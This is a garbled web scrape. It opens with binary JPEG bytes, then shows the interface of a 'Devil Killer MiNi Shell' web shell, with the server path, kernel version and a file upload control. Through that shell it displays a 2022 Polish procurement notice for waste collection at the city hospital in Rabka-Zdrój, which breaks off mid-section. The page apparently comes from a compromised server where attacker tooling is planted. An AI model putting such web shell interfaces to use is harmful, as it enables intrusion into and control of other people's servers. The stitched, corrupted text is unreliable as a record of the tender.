JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220705/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220705/0024003201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Świadczenie usługi odbioru odpadów komunalnych i innych wytwarzanych w „Szpitalu Miejskim<br/>w Rabce – Zdroju” Sp. z o.o. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Szpital Miejski w Rabce - Zdroju Sp. z o. o.</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 120480323</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słoneczna 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rabka-Zdrój</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL219 - Nowotarski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 26 77 001</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">18 26 77 001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@szpitalrabka.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://szpitalrabka.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Szpital - Spółka z ograniczoną odpowiedzialnością </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Świadczenie usługi odbioru odpadów komunalnych i innych wytwarzanych w „Szpitalu Miejskim<br/>w Rabce – Zdroju” Sp. z o.o. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-8cb68050-fc70-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00240032</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-07-05</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00032901/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.3 Odbiór, transport i utylizacja odpadów wytwarzanych w Spółce</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja pomiędzy<br/>Zamawiającym a wykonawcami, z wyjątkiem składania ofert, odbywa się za pośrednictwem dedykowanego formularza: „Formularz<br/>do komunikacji” dostępnego na ePUAP oraz udostępnionego przez miniPortal. Korespondencja przesłana za pomocą tego<br/>formularza nie może być szyfrowana. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy do<br/>komunikacji wynosi 150 MB.<br/>2. Oferty należy składać za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i<br/>udostępnionego również na miniPortalu. Szczegółowe informacje dotyczące sposobu składania ofert określone zostały w rozdziale<br/>XIV SWZ (sposób oraz termin składania ofert).<br/>3. Zamawiający może również komunikować się z wykonawcami za pomocą poczty elektronicznej, na adres email:<br/>sekretariat@szpitalrabka.pl<br/>4. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i<br/>oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z miniPortalu dostępnym<br/>pod adresem https://miniportal.uzp.gov.pl/WarunkiUslugi oraz Regulaminie ePUAP.<br/>5. We wszelkiej komunikacji związanej z niniejszym postępowaniem prowadzonej za pośrednictwem miniPortalu i ePUAP<br/>Zamawiający i wykonawcy posługują się identyfikatorem postępowania z MiniPortalu wskazanym w SWZ.<br/>6. W komunikacji prowadzonej za pomocą poczty elektronicznej Zamawiający dopuszcza posługiwanie się również oznaczeniem<br/>postępowania 26.1.6.2022</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia<br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE<br/>(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”,<br/>informujemy, że:<br/>a) Administratorem Pani/Pana danych osobowych jest Szpital Miejski w Rabce – Zdroju<br/>Sp. z o.o., ul. Słoneczna 3, 34 – 700 Rabka - Zdrój, tel. 18 26 77 001, adres e-mail:<br/>sekretariat@szpitalrabka.pl;<br/>b) Inspektor ochrony danych osobowych w Szpitalu Miejskim w Rabce – Zdroju Sp. z o.o. jest<br/>p. Paweł Chochół, e-mail: iodo@pc-consulting.com.pl<br/>c) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO<br/>w celu związanym z postępowaniem o udzielenie zamówienia publicznego znak sprawy:<br/>26.1.6.2022 – „Świadczenie usługi odbioru, transportu i unieszkodliwienia odpadów<br/>komunalnych i innych wytwarzanych w „Szpitalu Miejskim w Rabce – Zdroju” Sp. z o.o.”<br/>prowadzonym w trybie podstawowym;<br/>d) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 74 ustawy Pzp; <br/>e) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez<br/>okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia,<br/>a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>f) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym<br/>z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania<br/>określonych danych wynikają z ustawy Pzp;<br/>g) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane<br/>w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h) posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych<br/>z tym że skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy<br/>w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać integralności protokołu oraz<br/>jego załączników;<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych, z tym że prawo do ograniczenia przetwarzania danych osobowych, nie<br/>ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze<br/>środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub<br/>z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego;<br/>− prawo do wniesienia skargi do organu nadzorczego w przypadku gdy przetwarzanie danych<br/>odbywa się z naruszeniem przepisów powyższego rozporządzenia tj. Prezesa Ochrony Danych<br/>Osobowych, ul. Stawki 2, 00-193 Warszawa;<br/>i) nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">26.1.6.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest sukcesywne świadczenie usługi odbioru, transportu,<br/>przetwarzania, zagospodarowania lub unieszkodliwienia odpadów w zależności od jego<br/>rodzaju, zgodnie z wymogami określonymi w ustawie o odpadach z dnia 14 grudnia 2012 r.<br/>wraz z aktami wykonawczymi oraz innymi powszechnie obowiązującymi przepisami prawa<br/>w tym zakresie. Zadanie obejmuje odpady o następujących kodach:<br/>Kod odpadu Rodzaj odpadu<br/>20 01 39/15 01 02 tworzywa sztuczne/opakowania z tworzyw sztucznych<br/>20 01 40/15 01 04 metale/opakowania z metali<br/>20 01 01/15 01 01 papier i tektury/opakowania z papieru i tektury<br/>20 01 02/15 01 07 szkło/opakowania ze szkła<br/>20 03 01 niesegregowane zmieszane odpady komunalne (śmieci resztkowe)<br/>20 03 07 odpady wielkogabarytowe (pokasacyjne), meble<br/>20 02 01 odpady ulegające biodegradacji<br/>2. Szacunkowa ilość odpadów w okresie 24 miesięcy określona została w załączniku nr 1 do SWZ.<br/>Podane ilości, mają charakter szacunkowy. Stopień realizacji przedmiotu zamówienia<br/>uzależniony jest od potrzeb wynikających z działalności Zamawiającego. Zamawiający zastrzega<br/>sobie prawo do realizacji przedmiotu zamówienia w mniejszym zakresie niż to wynika z ilości<br/>określonych w SWZ. Realizacja przedmiotu zamówienia w mniejszym zakresie nie może<br/>stanowić podstawy do roszczeń ze strony Wykonawcy względem Zamawiającego,<br/>z zastrzeżeniem, że Zamawiający jest zobowiązany do nabycia od Wykonawcy w okresie<br/>realizacji umowy usług o wartości brutto stanowiącej co najmniej 50% zamówienia<br/>podstawowego.<br/>3. Zamawiający zastrzega sobie prawo, w trakcie trwania zamówienia również do możliwości<br/>skorzystania z prawa opcji, o którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego<br/>Zamawiający przewiduje zwiększenie ilości odpadów i kontenerów w ilości nie większej niż 20%<br/>zamówienia podstawowego.<br/>4. Odbiorca odpadów, w ramach świadczonej usługi, udostępni Zleceniodawcy na czas trwania<br/>umowy w cenie oferty, kontenery (pojemniki na kołach) do gromadzenia odpadów w ilości<br/>odpowiadającej potrzebom – co najmniej 13 kontenerów o pojemności 1100l o stosowanej<br/>kolorystyce przypisanej do danej frakcji (5 kontenerów na odpady zmieszane, 4 kontenery na<br/>tworzywa sztuczne, 2 kontenery na papier, 1 kontener na szkło, 1 kontener na odpady<br/>biodegradowalne) dostosowane do obowiązujących przepisów. Wykonawca winien<br/>zagwarantować dostarczenie dodatkowych pojemników do gromadzenia odpadów, jeśli ilość<br/>odpadów będzie większa niż pojemność pojemników, którymi dysponuje zamawiający.<br/>Kontenery będą dostarczane przez Wykonawcę systemem rotacyjnym. Ilość dostarczonych<br/>pustych kontenerów musi być równa ilości odebranych zapełnionych.<br/>5. Wymaga się by Wykonawca zagwarantował wywóz odpadów według potrzeb zamawiającego,<br/>nie rzadziej niż 2 razy w tygodniu odpadów zmieszanych, a pozostałych frakcji co najmniej 2<br/>razy w miesiącu w dni robocze w godzinach 7:00 – 14:00. Ponadto, Wykonawca zobowiązuje<br/>się do odbierania odpadów i transportu tych odpadów do miejsc odzysku lub unieszkodliwiania<br/>na każdorazowe zgłoszenie Zamawiającego w przypadku zapełnienia pojemników, w ilości kontenerów zawierających odpady wskazane w zgłoszeniu. W takim wypadku odbiór będzie<br/>następował w następnym dniu po dokonaniu zgłoszenia, niezależnie od odbioru<br/>przewidzianego w zdaniu poprzednim;<br/>6. Wykonawca musi być zarejestrowany w systemie BDO, aby umożliwić realizację obowiązków w<br/>zakresie gospodarki odpadami. Każdy odbiór musi być potwierdzony „Kartą przekazania<br/>odpadów” wystawioną elektronicznie w systemie BDO, zgodnie z obowiązującymi przepisami.<br/>7. Wykonawca jest zobligowany do posiadania wszelkich stosownych zezwoleń, pozwoleń, zgód,<br/>zgłoszeń, koncesji, licencji itp. wymaganych prawem dotyczących odbioru, transportu i<br/>unieszkodliwiania odpadów wyszczególnionych w ust. 1, przez cały okres trwania umowy oraz<br/>ich okazywania Zamawiającemu na każde jego wezwanie. W przypadku, gdy którekolwiek z<br/>dotychczasowych zezwoleń wygaśnie lub zostanie cofnięte w okresie obowiązywania umowy,<br/>Wykonawca zobowiązany jest przedstawić nowe zezwolenie w tym zakresie, nie później niż w<br/>ostatnim dniu obowiązywania dotychczasowego.<br/>8. Pojazdy służące do transportu odpadów muszą spełniać wymagania wynikające z przepisów<br/>prawa na terenie RP.<br/>9. Obecnym miejscem odbioru odpadów jest Szpital Miejski w Rabce – Zdroju Sp. z o.o. z siedzibą<br/>przy ul. Słonecznej 3, 34 – 700 Rabka – Zdrój z zastrzeżeniem, że szpital zmienia lokalizację na<br/>czas rozbudowy i remontu (Rabka – Zdrój lub okolice miasta).<br/>10. Pozostałe warunki zamówienia określają projektowane postanowienia umowne, stanowiące załącznik nr 5 do SWZ.<br/>11. Wymagania w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach o których<br/>mowa w art. 95 ustawy Pzp:<br/>1) Wymagania związane z realizacją zamówienia w zakresie zatrudnienia przez Wykonawcę lub<br/>podwykonawcę na podstawie stosunku pracy osób wykonujących wskazane przez<br/>Zamawiającego czynności w zakresie realizacji zamówienia, jeżeli wykonanie tych czynności<br/>polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca<br/>1974 r. - Kodeks pracy (t.j. Dz.U. 2020 poz. 1320) obejmują następujące rodzaje czynności:<br/>− kierowców pojazdów transportujących odpady,<br/>− wykonujących prace związane z załadunkiem, ważeniem, odbiorem, transportem,<br/>wywozem, przetwarzaniem, zagospodarowaniem, unieszkodliwieniem i utylizacją<br/>odpadów,<br/>− administracyjno-biurowe, polegające w szczególności na sprawowaniu nadzoru nad<br/>realizacją umowy, wystawianiu faktur VAT oraz prowadzeniu dokumentacji dotyczącej<br/>odpadów, np. kart przekazania odpadów.<br/>2) W trakcie realizacji zamówienia Zamawiający uprawniony jest do wykonywania czynności<br/>kontrolnych wobec Wykonawcy odnośnie spełniania przez Wykonawcę lub podwykonawcę<br/>wymogu zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie<br/>1) czynności. Zamawiający uprawniony jest w szczególności do:<br/>− żądania oświadczenia zatrudnionego pracownika,<br/>− żądania oświadczenia wykonawcy lub podwykonawcy o zatrudnieniu pracownika na<br/>podstawie umowy o pracę,<br/>− żądania poświadczonej za zgodność z oryginałem kopii umowy o pracę zatrudnionego<br/>pracownika,<br/>− żądania wyjaśnień w przypadku wątpliwości w zakresie potwierdzenia spełniania ww.<br/>wymogów,<br/>− żądania zaświadczenia właściwego oddziału ZUS, potwierdzającego opłacanie przez<br/>wykonawcę lub podwykonawcę składek na ubezpieczenia społeczne i zdrowotne z tytułu<br/>zatrudnienia na podstawie umów o pracę za ostatni okres rozliczeniowy;<br/>− przeprowadzania kontroli na miejscu wykonywania świadczenia.<br/>3) Dokumenty, o których mowa w pkt. 2) muszą zawierać informacje, w tym dane osobowe,<br/>niezbędne do weryfikacji zatrudnienia na podstawie umowy o pracę, w szczególności imię<br/>i nazwisko zatrudnionego pracownika, datę zawarcia umowy o pracę, rodzaj umowy o pracę<br/>i zakres obowiązków pracownika.<br/>4) Z tytułu niespełnienia przez Wykonawcę lub podwykonawcę wymogu zatrudnienia na<br/>podstawie umowy o pracę osób wykonujących wskazane w punkcie 1) czynności<br/>Zamawiający przewiduje sankcję w postaci obowiązku zapłaty przez Wykonawcę kary<br/>umownej w wysokości określonej w istotnych postanowieniach umowy w sprawie<br/>zamówienia publicznego. Niezłożenie przez Wykonawcę w wyznaczonym przez<br/>Zamawiającego terminie żądanych przez Zamawiającego dowodów w celu potwierdzenia<br/>spełnienia przez Wykonawcę lub Podwykonawcę wymogu zatrudnienia na podstawie umowy<br/>o pracę traktowane będzie jako niespełnienie przez Wykonawcę lub Podwykonawcę wymogu<br/>zatrudnienia na podstawie umowy o pracę osób wykonujących wskazane w punkcie<br/>1) czynności.<br/>5) Postanowienia zawarte w pkt. 1) - 4) dotyczą również dalszych podwykonawców. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90500000-2 - Usługi związane z odpadami</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90512000-9 - Usługi transportu odpadów</p> <p class="mb-0">90533000-2 - Usługi gospodarki odpadami</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> Zamawiający zastrzega sobie prawo, w trakcie trwania zamówienia również do możliwości skorzystania z prawa opcji, o<br/>którym mowa w art. 441 ust. 1 Pzp, w zakresie, którego Zamawiający przewiduje zwiększenie ilości odpadów i kontenerów<br/>w ilości nie większej niż 20% zamówienia podstawowego, na zasadach określonych w projektowanych postanowieniach<br/>umownych. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">24 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje udzielenia zamówień, o których mowa w art. 214 ust. 1 pkt 7<br/>i 8 ustawy Pzp, polegające na powtórzeniu podobnych usług, których zakres i wartość nie<br/>przekroczy 20% wartości zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1) Ocenie poddane zostaną oferty nie podlegające odrzuceniu.<br/>2) Zamawiający dokona oceny ofert w zakresie kryterium „Cena” na następujących zasadach:<br/>a) Podstawą oceny ofert w tym kryterium będzie cena brutto za wykonanie przedmiotu zamówienia, podana przez Wykonawcę w<br/>Formularzu ofertowym.<br/>b) Liczba punktów przyznanych poszczególnym ofertom wyliczona zostanie wg. formuły:<br/>Kc=(C min)/(C of ocen) x 100<br/>gdzie:<br/>Kc – liczba punktów otrzymanych w kryterium „Cena”<br/>C min – cena najniższa wśród ofert nie odrzuconych<br/>C of ocen – cena oferty badanej<br/>c) Ilość punktów obliczona według powyższej formuły zostanie zaokrąglona do dwóch miejsc po przecinku.<br/>3) Za najkorzystniejszą uznana zostanie oferta, która otrzyma największą ilość punktów rozumianą jako suma punktów przyznanych<br/>na podstawie kryteriów oceny ofert podanych w punkcie A, a obliczonych zgodnie z zasadami określonymi w punkcie B.<br/>4) Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1 %<br/>= 1 pkt. Maksymalna liczba punktów w kryterium równa jest określonej wadze kryterium w %. Uzyskana liczba punktów w ramach<br/>kryterium zaokrąglana będzie do drugiego miejsca po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: 